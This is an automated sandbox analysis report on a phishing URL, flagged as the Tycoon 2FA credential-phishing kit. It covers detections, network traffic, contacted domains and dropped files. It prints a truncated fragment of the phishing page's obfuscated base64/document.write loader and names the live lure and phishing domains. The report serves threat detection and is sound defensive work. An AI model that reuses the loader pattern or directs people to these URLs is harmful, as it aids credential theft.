Windows Analysis Report
https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr

Overview

General Information

Sample URL: https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7d
Analysis ID: 1650540
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score: 92
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder

Classification

[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Levels: clean, suspicious, malicious.]
  • System is w10x64_ra
  • chrome.exe (PID: 6960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6212 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2104,i,15964423701433874769,16393612139017731578,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Source | Rule | Description | Author | Strings
dropped/chromecache_69 | JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |

Source | Rule | Description | Author | Strings
2.20.d.script.csv | JoeSecurity_HangulCharacter | Yara detected Obfuscation Via HangulCharacter | Joe Security |
2.19.d.script.csv | JoeSecurity_Tycoon2FA_1 | Yara detected Tycoon 2FA PaaS | Joe Security |
2.19.d.script.csv | JoeSecurity_AntiDebugBrowser | Yara detected AntiDebug via timestamp check | Joe Security |
2.26..script.csv | JoeSecurity_HangulCharacter | Yara detected Obfuscation Via HangulCharacter | Joe Security |
2.20.d.script.csv | JoeSecurity_InvisibleJS | Yara detected Invisible JS | Joe Security |
              No Sigma rule has matched
              No Suricata rule has matched

              AV Detection

              Source: https://pjk2.vamdyduebs.es/kT9ifrJ/ Avira URL Cloud: Label: phishing

              Phishing

              Source: Yara match File source: dropped/chromecache_69, type: DROPPED
              Source: Yara match File source: 2.20.d.script.csv, type: HTML
              Source: Yara match File source: 2.11.pages.csv, type: HTML
              Source: Yara match File source: 2.15.pages.csv, type: HTML
              Source: Yara match File source: 2.26..script.csv, type: HTML
              Source: Yara match File source: 2.19.d.script.csv, type: HTML
              Source: Yara match File source: 2.25.d.script.csv, type: HTML
              Source: 2.21..script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://pjk2.vamdyduebs.es/kT9ifrJ/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script appears to be attempting to execute a malicious payload by decoding and executing a heavily obfuscated string. This is a clear indication of a high-risk, potentially malicious script that should be blocked or further investigated.
              Source: 2.26..script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://pjk2.vamdyduebs.es/kT9ifrJ/... This script demonstrates high-risk behavior, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
              Source: https://lisachubb.com/jsuhsks/#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr HTTP Parser: No favicon
              Source: https://pjk2.vamdyduebs.es/kT9ifrJ/ HTTP Parser: No favicon
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92711f95296d0c74/1743101951339/gG7XUl8rREJ52dX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/92711f95296d0c74/1743101951339/30af089456f68310af88812ffb4625e605cc57cdad4a126551e5cd66f2a8f2db/gsRwXFCPxzgMfCD HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/596471834:1743093201:HfWe0GQspI-1r3OVdQ5KGaX9jP-ApZEFs_ADxL9ljvM/92711f95296d0c74/Tn4YPIhxUHt2rP15l6DeszPnEqjUkO3bhDlwJUrzwbU-1743101950-1.1.1.1-N4oWEouU682F07H_ItAmco_0uPGAOQuOU3dHZiX_O3NZZ.rFm35YWTFkjMacrI_X HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global traffic, DNS traffic detected: DNS query: www.google.com
              Source: global traffic, DNS traffic detected: DNS query: lisachubb.com
              Source: global traffic, DNS traffic detected: DNS query: pjk2.vamdyduebs.es
              Source: global traffic, DNS traffic detected: DNS query: code.jquery.com
              Source: global traffic, DNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global traffic, DNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global traffic, DNS traffic detected: DNS query: developers.cloudflare.com
              Source: global traffic, DNS traffic detected: DNS query: beacons.gcp.gvt2.com
              Source: global traffic, DNS traffic detected: DNS query: beacons.gvt2.com
              Source: global traffic, DNS traffic detected: DNS query: beacons2.gvt2.com
              Source: global traffic, DNS traffic detected: DNS query: beacons3.gvt2.com
              Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 27 Mar 2025 18:58:26 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File created: C:\Windows\SystemTemp\scoped_dir6960_1680330996
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe, File deleted: C:\Windows\SystemTemp\scoped_dir6960_1680330996
              Source: classification engine, Classification label: mal92.phis.evad.win@27/23@54/161
              Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2104,i,15964423701433874769,16393612139017731578,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3
              Source: unknown, Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe, Process created: unknown unknown
              Source: Window Recorder, Window detected: More than 3 window changes detected

              Malware Analysis System Evasion

              Source: Yara match, File source: 2.19.d.script.csv, type: HTML
              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
              Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
              Persistence: 1 Browser Extensions; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
              Privilege Escalation: 1 Process Injection; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
              Defense Evasion: 1 Masquerading; 1 Process Injection; 1 File Deletion; Binary Padding
              Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
              Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
              Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
              Command and Control: 1 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; 3 Ingress Tool Transfer
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

              Source | Detection | Scanner | Label | Link
              https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr | 0% | Avira URL Cloud | safe
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://lisachubb.com/favicon.ico | 0% | Avira URL Cloud | safe
              https://www.google.com/recaptcha/api2/bframe?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | 0% | Avira URL Cloud | safe
              https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h | 0% | Avira URL Cloud | safe
              https://lisachubb.com/jsuhsks/ | 0% | Avira URL Cloud | safe
              https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU&co=aHR0cHM6Ly9saXNhY2h1YmIuY29tOjQ0Mw..&hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&size=normal&cb=1vy2jk5iocqm | 0% | Avira URL Cloud | safe
              https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5MCKN6FTOwAV4O7fEJmG2kPHijDCZTqaRlwvooLkhwF1SDrBnZkPr0fv7wZ9wqVjJgeF4YrrxgulfO87Or5B7OHf3HhJ8vL-sF4Oxi24848VprKVfug-7_N1GxMm7D-ZsyPVmuMRPSebbbPYc_plJmCgvg22D6Boc4Qe4Yla0_WzjD-qRF2VOtP7PS6i31ttQpyKR8&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | 0% | Avira URL Cloud | safe
              https://www.google.com/recaptcha/api2/reload?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | 0% | Avira URL Cloud | safe
              https://www.google.com/recaptcha/api2/clr?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | 0% | Avira URL Cloud | safe
              https://www.google.com/recaptcha/api2/userverify?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | 0% | Avira URL Cloud | safe
              https://pjk2.vamdyduebs.es/kT9ifrJ/ | 100% | Avira URL Cloud | phishing
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92711f95296d0c74&lang=auto | 0% | Avira URL Cloud | safe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/596471834:1743093201:HfWe0GQspI-1r3OVdQ5KGaX9jP-ApZEFs_ADxL9ljvM/92711f95296d0c74/Tn4YPIhxUHt2rP15l6DeszPnEqjUkO3bhDlwJUrzwbU-1743101950-1.1.1.1-N4oWEouU682F07H_ItAmco_0uPGAOQuOU3dHZiX_O3NZZ.rFm35YWTFkjMacrI_X | 0% | Avira URL Cloud | safe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/ | 0% | Avira URL Cloud | safe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92711f95296d0c74/1743101951339/30af089456f68310af88812ffb4625e605cc57cdad4a126551e5cd66f2a8f2db/gsRwXFCPxzgMfCD | 0% | Avira URL Cloud | safe
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92711f95296d0c74/1743101951339/gG7XUl8rREJ52dX | 0% | Avira URL Cloud | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              beacons3.gvt2.com | 142.250.80.67 | true | false | | high
              pjk2.vamdyduebs.es | 172.67.185.250 | true | true | | unknown
              code.jquery.com | 151.101.2.137 | true | false | | high
              developers.cloudflare.com | 104.16.6.189 | true | false | | high
              cdnjs.cloudflare.com | 104.17.25.14 | true | false | | high
              beacons-handoff.gcp.gvt2.com | 142.251.116.94 | true | false | | high
              challenges.cloudflare.com | 104.18.95.41 | true | false | | high
              www.google.com | 142.250.81.228 | true | false | | high
              beacons2.gvt2.com | 142.250.79.99 | true | false | | high
              lisachubb.com | 104.245.240.188 | true | false | | unknown
              beacons.gvt2.com | 142.250.81.227 | true | false | | high
              beacons.gcp.gvt2.com | unknown | unknown | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92711f95296d0c74&lang=auto | false | Avira URL Cloud: safe | unknown
              https://www.google.com/recaptcha/api2/userverify?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | false | Avira URL Cloud: safe | unknown
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/596471834:1743093201:HfWe0GQspI-1r3OVdQ5KGaX9jP-ApZEFs_ADxL9ljvM/92711f95296d0c74/Tn4YPIhxUHt2rP15l6DeszPnEqjUkO3bhDlwJUrzwbU-1743101950-1.1.1.1-N4oWEouU682F07H_ItAmco_0uPGAOQuOU3dHZiX_O3NZZ.rFm35YWTFkjMacrI_X | false | Avira URL Cloud: safe | unknown
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1 | false | | high
              https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h | false | Avira URL Cloud: safe | unknown
              https://code.jquery.com/jquery-3.6.0.min.js | false | | high
              https://lisachubb.com/favicon.ico | false | Avira URL Cloud: safe | unknown
              https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js | false | | high
              https://developers.cloudflare.com/favicon.png | false | | high
              https://www.google.com/recaptcha/api.js | false | | high
              https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU&co=aHR0cHM6Ly9saXNhY2h1YmIuY29tOjQ0Mw..&hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&size=normal&cb=1vy2jk5iocqm | false | Avira URL Cloud: safe | unknown
              https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb | false | | high
              https://www.google.com/recaptcha/api2/reload?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | false | Avira URL Cloud: safe | unknown
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/ | false | Avira URL Cloud: safe | unknown
              https://pjk2.vamdyduebs.es/kT9ifrJ/ | true | Avira URL Cloud: phishing | unknown
              https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js | false | | high
              https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5MCKN6FTOwAV4O7fEJmG2kPHijDCZTqaRlwvooLkhwF1SDrBnZkPr0fv7wZ9wqVjJgeF4YrrxgulfO87Or5B7OHf3HhJ8vL-sF4Oxi24848VprKVfug-7_N1GxMm7D-ZsyPVmuMRPSebbbPYc_plJmCgvg22D6Boc4Qe4Yla0_WzjD-qRF2VOtP7PS6i31ttQpyKR8&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | false | Avira URL Cloud: safe | unknown
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92711f95296d0c74/1743101951339/30af089456f68310af88812ffb4625e605cc57cdad4a126551e5cd66f2a8f2db/gsRwXFCPxzgMfCD | false | Avira URL Cloud: safe | unknown
              https://lisachubb.com/jsuhsks/ | false | Avira URL Cloud: safe | unknown
              https://www.google.com/recaptcha/api2/clr?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | false | Avira URL Cloud: safe | unknown
              https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback | false | | high
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92711f95296d0c74/1743101951339/gG7XUl8rREJ52dX | false | Avira URL Cloud: safe | unknown
              https://www.google.com/recaptcha/api2/bframe?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.65.170 | unknown | United States | 15169 | GOOGLEUS | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
142.250.65.163 | unknown | United States | 15169 | GOOGLEUS | false
142.251.40.227 | unknown | United States | 15169 | GOOGLEUS | false
142.250.176.206 | unknown | United States | 15169 | GOOGLEUS | false
104.18.95.41 | challenges.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
142.250.81.228 | www.google.com | United States | 15169 | GOOGLEUS | false
172.67.185.250 | pjk2.vamdyduebs.es | United States | 13335 | CLOUDFLARENETUS | true
142.250.80.67 | beacons3.gvt2.com | United States | 15169 | GOOGLEUS | false
151.101.2.137 | code.jquery.com | United States | 54113 | FASTLYUS | false
142.251.40.131 | unknown | United States | 15169 | GOOGLEUS | false
104.16.6.189 | developers.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
104.16.4.189 | unknown | United States | 13335 | CLOUDFLARENETUS | false
104.17.25.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
104.245.240.188 | lisachubb.com | United States | 8100 | ASN-QUADRANET-GLOBALUS | false
142.251.163.84 | unknown | United States | 15169 | GOOGLEUS | false
                                                      IP
                                                      192.168.2.17
                                                      192.168.2.16
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1650540
                                                      Start date and time:2025-03-27 19:57:52 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                      Sample URL:https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:16
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • EGA enabled
                                                      Analysis Mode:stream
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal92.phis.evad.win@27/23@54/161
                                                      • Exclude process from analysis (whitelisted): svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 142.250.176.206, 142.250.80.67, 142.251.163.84, 142.250.81.238, 142.251.40.227, 142.250.65.170, 142.250.65.202, 142.251.40.138, 142.251.40.170, 142.250.64.74, 142.250.64.106, 142.250.72.106, 142.250.80.10, 142.250.80.42, 142.250.80.74, 142.250.80.106, 142.250.176.202, 142.251.40.202, 142.251.40.234, 142.251.41.10, 172.217.165.138, 142.250.65.163
                                                      • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, fonts.gstatic.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48122)
                                                      Category:downloaded
                                                      Size (bytes):48123
                                                      Entropy (8bit):5.342998089666478
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EA38BDA3C117E2FE01BD862003357394
                                                      SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                      SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                      SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):48316
                                                      Entropy (8bit):5.6346993394709
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):16
                                                      Entropy (8bit):3.75
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:AFB69DF47958EB78B4E941270772BD6A
                                                      SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                      SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                      SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCWgZVbeitMz5EgUNU1pHxSEfnXXTHl79Fg==?alt=proto
                                                      Preview:CgkKBw1TWkfFGgA=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with very long lines (65360)
                                                      Category:downloaded
                                                      Size (bytes):911083
                                                      Entropy (8bit):3.3343563750503438
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:36D82F796532D419BA3B930BF5B3E953
                                                      SHA1:0964FB9E1FE27BC634A671E68D385B960456005F
                                                      SHA-256:867F4538ACAC236D8E477ABFBD95D2FCC00590E6DD42AA647EE2771882E5D077
                                                      SHA-512:FF7C22F0533A6E338BC53CC4407BFE193EDECB947B63CD36D7853FD4F3D0E9A424B163CF198CB3E91663A9AC81DDB2C74C0C3AB4E4FE51C467D6A230D0DC3EFA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://pjk2.vamdyduebs.es/kT9ifrJ/
Preview:<script>.gDOOnBtCXK = atob("aHR0cHM6Ly9rS0ZKLnZhbWR5ZHVlYnMuZXMva1Q5aWZySi8=");.bUldmtlwyx = atob("bm9tYXRjaA==");.zrSLIepGCu = atob("d3JpdGU=");.if(gDOOnBtCXK == bUldmtlwyx){.document[zrSLIepGCu](decodeURIComponent(escape(atob('
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                      Category:downloaded
                                                      Size (bytes):346
                                                      Entropy (8bit):5.307167666984022
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:91C22A154187ED32F7B07D4671C4FCF7
                                                      SHA1:BEE740043A0572B0F2749DB8A0B7156E37DD165B
                                                      SHA-256:21037BC77126F8390BCA8D4675B469F5DA20E2D1FB76F0DAE2AC6A50B7CD4FBE
                                                      SHA-512:7CE9FB54213A701FE5EAE1FCB95FF7A73434FEDD8F41A04C7EAEF9FD9B731AC837BB9E90E1A71CF872134AE247A695899B667740CBACCEF3796C3AC4DDA1F398
                                                      Malicious:false
                                                      Reputation:unknown
                                                      URL:https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h
                                                      Preview:<HTML><HEAD>.<meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>Redirecting</TITLE>.<META HTTP-EQUIV="refresh" content="1; url=https://lisachubb.com/jsuhsks/">.</HEAD>.<BODY onLoad="location.replace('https://lisachubb.com/jsuhsks/'+document.location.hash)">.Redirecting you to https://lisachubb.com/jsuhsks/</BODY></HTML>..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
